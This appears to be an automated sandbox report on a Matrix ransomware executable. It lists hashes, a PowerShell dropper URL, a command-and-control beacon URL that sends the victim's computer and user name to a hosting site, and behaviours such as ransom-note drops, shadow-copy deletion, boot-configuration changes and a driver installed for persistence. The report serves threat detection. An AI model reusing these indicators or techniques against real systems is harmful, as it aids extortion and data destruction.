matrix | 2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3

Analysis

max time kernel
150s
max time network
44s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
28-12-2022 18:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
Size

1.2MB
MD5

6411153c8a95e8c77127d99c75595604
SHA1

02e6b8baed744a6b0c78baddf1720654688e5642
SHA256

2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3
SHA512

65f8479bb477d76af915811b44a06bc4ca076955d22e6d3cdc336f6e3c7d7299ef52da81aa3d13f6f5f9170ba5b9ac049fe67edc1df0a8899e8a4b7b03a82ade
SSDEEP

24576:+/SA+2lraRrjSJR5ezmT1dM9fB3NIDreFqO:yXlCIfe

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Microsoft Games\Hearts\es-ES\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Users\Public\Videos\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\DataType\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Users\Default\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
HTTP URL	2	http://fredstat.000webhostapp.com/addrecord.php?apikey=fox_api_key&compuser=ORXGKKZC\|Admin&sid=CKKNaFq74Z3WuMyZ&phase=START
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Spades\en-US\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\it-IT\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\InfoPathOMFormServicesV12\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\WSS\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\index-dir\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\1033\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\1033\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Esl\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Checkers\fr-FR\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Extensions\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Microsoft Games\Purble Place\en-US\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\images\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Microsoft Games\SpiderSolitaire\de-DE\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\VideoLAN\VLC\lua\playlist\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Users\Public\Recorded TV\Sample Media\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Users\Admin\Desktop\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\1033\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Users\Admin\Links\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

1188 bcdedit.exe
1540 bcdedit.exe
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

8 1792 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

XPo38R1T64.exe

description ioc process

File created C:\Windows\system32\Drivers\PROCEXP152.SYS XPo38R1T64.exe
Executes dropped EXE 3 IoCs

Processes:

NWb6U328.exeXPo38R1T.exeXPo38R1T64.exe

pid process

904 NWb6U328.exe
996 XPo38R1T.exe
772 XPo38R1T64.exe

pid	process
1188	bcdedit.exe
1540	bcdedit.exe

flow	pid	process
8	1792	powershell.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	XPo38R1T64.exe

pid	process
904	NWb6U328.exe
996	XPo38R1T.exe
772	XPo38R1T64.exe

Modifies extensions of user files 3 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\HideStep.tiff	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Admin\Pictures\DenyImport.tiff	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Admin\Pictures\ClearConvertTo.tiff	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

XPo38R1T64.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	XPo38R1T64.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\XPo38R1T.exe	upx
\Users\Admin\AppData\Local\Temp\XPo38R1T.exe	upx
C:\Users\Admin\AppData\Local\Temp\XPo38R1T.exe	upx
behavioral1/memory/996-95-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Loads dropped DLL 4 IoCs

Processes:

2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.execmd.exeXPo38R1T.exe

pid	process
1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
1368	cmd.exe
996	XPo38R1T.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exe

pid process

1556 takeown.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1556	takeown.exe

Drops desktop.ini file(s) 42 IoCs

Processes:

2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\P35Q2WMD\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Public\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\UIFY0MN9\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\9W0XRO68\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\31F8NSAV\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-999675638-2867687379-27515722-1000\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exeXPo38R1T64.exe

description	ioc	process
File opened (read-only)	\??\W:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\U:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\I:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\Y:	XPo38R1T64.exe
File opened (read-only)	\??\R:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\E:	XPo38R1T64.exe
File opened (read-only)	\??\Q:	XPo38R1T64.exe
File opened (read-only)	\??\U:	XPo38R1T64.exe
File opened (read-only)	\??\B:	XPo38R1T64.exe
File opened (read-only)	\??\F:	XPo38R1T64.exe
File opened (read-only)	\??\J:	XPo38R1T64.exe
File opened (read-only)	\??\M:	XPo38R1T64.exe
File opened (read-only)	\??\Z:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\N:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\J:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\E:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\N:	XPo38R1T64.exe
File opened (read-only)	\??\K:	XPo38R1T64.exe
File opened (read-only)	\??\P:	XPo38R1T64.exe
File opened (read-only)	\??\X:	XPo38R1T64.exe
File opened (read-only)	\??\V:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\O:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\K:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\I:	XPo38R1T64.exe
File opened (read-only)	\??\Z:	XPo38R1T64.exe
File opened (read-only)	\??\S:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\F:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\H:	XPo38R1T64.exe
File opened (read-only)	\??\O:	XPo38R1T64.exe
File opened (read-only)	\??\A:	XPo38R1T64.exe
File opened (read-only)	\??\G:	XPo38R1T64.exe
File opened (read-only)	\??\S:	XPo38R1T64.exe
File opened (read-only)	\??\T:	XPo38R1T64.exe
File opened (read-only)	\??\Y:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\T:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\P:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\L:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\M:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\G:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\R:	XPo38R1T64.exe
File opened (read-only)	\??\V:	XPo38R1T64.exe
File opened (read-only)	\??\W:	XPo38R1T64.exe
File opened (read-only)	\??\X:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\Q:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\H:	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened (read-only)	\??\L:	XPo38R1T64.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

7 myexternalip.com

flow	ioc
7	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\WVwHJllM.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

Processes:

2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_zh_CN.jar	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\en-US\Hearts.exe.mui	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
